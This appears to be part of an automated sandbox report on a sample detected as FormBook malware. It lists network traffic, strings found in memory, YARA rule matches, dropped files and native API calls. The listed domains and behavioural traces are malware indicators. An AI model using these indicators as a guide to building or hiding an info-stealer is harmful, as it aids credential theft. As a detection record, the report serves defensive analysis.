            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Sep 2020 14:47:03 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: no-cachecontent-language: enx-wix-request-id: 1600699623.782789711115195vary: Accept-EncodingAge: 0X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjTybE2BzSWtM7HTFP9VFEC,2d58ifebGbosy5xc+FRaloPX4ngKfQM8fEHbwELHijnEXQ2/68Un6qnh1J4MeNs1WIHlCalF7YnfvOr2cMPpyw==,Nlv1KFVtIvAfa3AK9dRsI0uHmepHlxDNsmSKhfIbcIJWd3xniMsr1HjrszKGvMzr,2UNV7KOq4oGjA5+PKsX47FDtGCr72w4BMu4v3sd6ZGU=,qquldgcFrj2n046g4RNSVO41WPKnFMbc7ID/2Bjixvw=,LXlT8qjS5x6WBejJA3+gBV3rMnjOqLl2cZe24jK447KTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UOYNUEAXqn/WZl+iQhS1dpQ4tYPCIn0xdi8lnDzR9qKl0JDQPGidxH0yAUk8YNY2WIHlCalF7YnfvOr2cMPpyw==,LXlT8qjS5x6WBejJA3+gBV3rMnjOqLl2cZe24jK447KTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,IaDuTAMGGvhXtruM6nHg6saWad6chcA1IdKNJ2oysB5NG+KuK+VIZfbNzHJu0vJu,a3Wp9ZyujRzrXdcjNnttJroCVlUX3HA8CNXa/Wj4FZ9Y2J424u2BB5qsIDUDYaV+I5gzac6Ha/CTe5yTy9BfOQ==Server: Pepyaka/1.19.0Data Raw: 62 64 30 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 Data Ascii: bd0 <!-- 
--><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_t
            Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp | String found in binary or memory: http://browsehappy.com/
            Source: CN03716-20.exe, 00000000.00000003.260996277.0000000005E09000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.257621308.0000000005E3D000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
            Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp | String found in binary or memory: http://i.cdnpark.com/themes/registrar/791105.css
            Source: CN03716-20.exe, 00000000.00000002.290578484.0000000002EA1000.00000004.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.504570205.0000000003391000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
            Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comC
            Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comCon
            Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comS
            Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comVM
            Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp, CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comn-uD
            Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comnMD
            Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comv-s-
            Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comvMn
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: CN03716-20.exe, 00000000.00000003.263942943.0000000005E33000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: CN03716-20.exe, 00000000.00000003.264788683.0000000005E0C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlS
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: CN03716-20.exe, 00000000.00000003.266267384.0000000005E33000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designerss
            Source: CN03716-20.exe, 00000000.00000003.266267384.0000000005E33000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersy
            Source: CN03716-20.exe, 00000000.00000003.264319642.0000000005E33000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersz
            Source: CN03716-20.exe, 00000000.00000002.290344600.0000000001537000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comF
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
            Source: CN03716-20.exe, 00000000.00000003.257242203.0000000005E3D000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com7
            Source: CN03716-20.exe, 00000000.00000003.257293184.0000000005E3D000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com8
            Source: CN03716-20.exe, 00000000.00000003.257143704.0000000005E3D000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comW
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnBM-
            Source: CN03716-20.exe, 00000000.00000003.259637169.0000000005E0E000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnI
            Source: CN03716-20.exe, 00000000.00000003.259751017.0000000005E11000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnS
            Source: CN03716-20.exe, 00000000.00000003.259488439.0000000005E03000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cna-e.
            Source: CN03716-20.exe, 00000000.00000003.259488439.0000000005E03000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnn-u
            Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnormN
            Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnr-t
            Source: CN03716-20.exe, 00000000.00000003.268205417.0000000005E03000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: CN03716-20.exe, 00000000.00000003.271944510.0000000005E0B000.00000004.00000001.sdmp, CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: control.exe, 00000010.00000002.529344625.0000000004B29000.00000004.00000001.sdmp | String found in binary or memory: http://www.lifecoachwoman.com
            Source: control.exe, 00000010.00000002.529344625.0000000004B29000.00000004.00000001.sdmp | String found in binary or memory: http://www.lifecoachwoman.com/cmg/
            Source: CN03716-20.exe, 00000000.00000003.267987189.0000000005E03000.00000004.00000001.sdmp | String found in binary or memory: http://www.monotype.
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com2
            Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.comS
            Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.comtM
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
            Source: CN03716-20.exe, 00000000.00000003.260108438.0000000005E0C000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com5
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.co
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn(M
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cnCo:
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cnS
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cnbr?
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cnseV
            Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: control.exe, 00000010.00000002.519302835.0000000000498000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Ll
            Source: CN03716-20.exe, 00000000.00000002.289598664.0000000001199000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            Detected FormBook malware
            Source: C:\Windows\SysWOW64\control.exe | Dropped file: C:\Users\user\AppData\Roaming\0K910UP8\0K9logri.ini
            Source: C:\Windows\SysWOW64\control.exe | Dropped file: C:\Users\user\AppData\Roaming\0K910UP8\0K9logrv.ini
            Malicious sample detected (through community Yara rule)
            Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00419CA0 NtCreateFile
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00419D50 NtReadFile
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00419DD0 NtClose
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00419E80 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00419C5A NtCreateFile
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00419CF2 NtCreateFile
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00419C9A NtCreateFile
            Source: C:\Users\user\Desktop\CN03716-20.exe | Code function: 7_2_00419E7A NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9840 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9860 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9540 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9560 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9910 NtAdjustPrivilegesToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B95D0 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B99A0 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9A50 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9650 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9660 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9610 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B96D0 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B96E0 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9770 NtSetInformationFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9B00 NtSetValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9710 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9FE0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9780 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044BB040 NtSuspendThread
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B9820 NtEnumerateKey
            Source: C:\Windows\SysWOW64\control.exe | Code function: 16_2_044B98F0 NtReadVirtualMemory
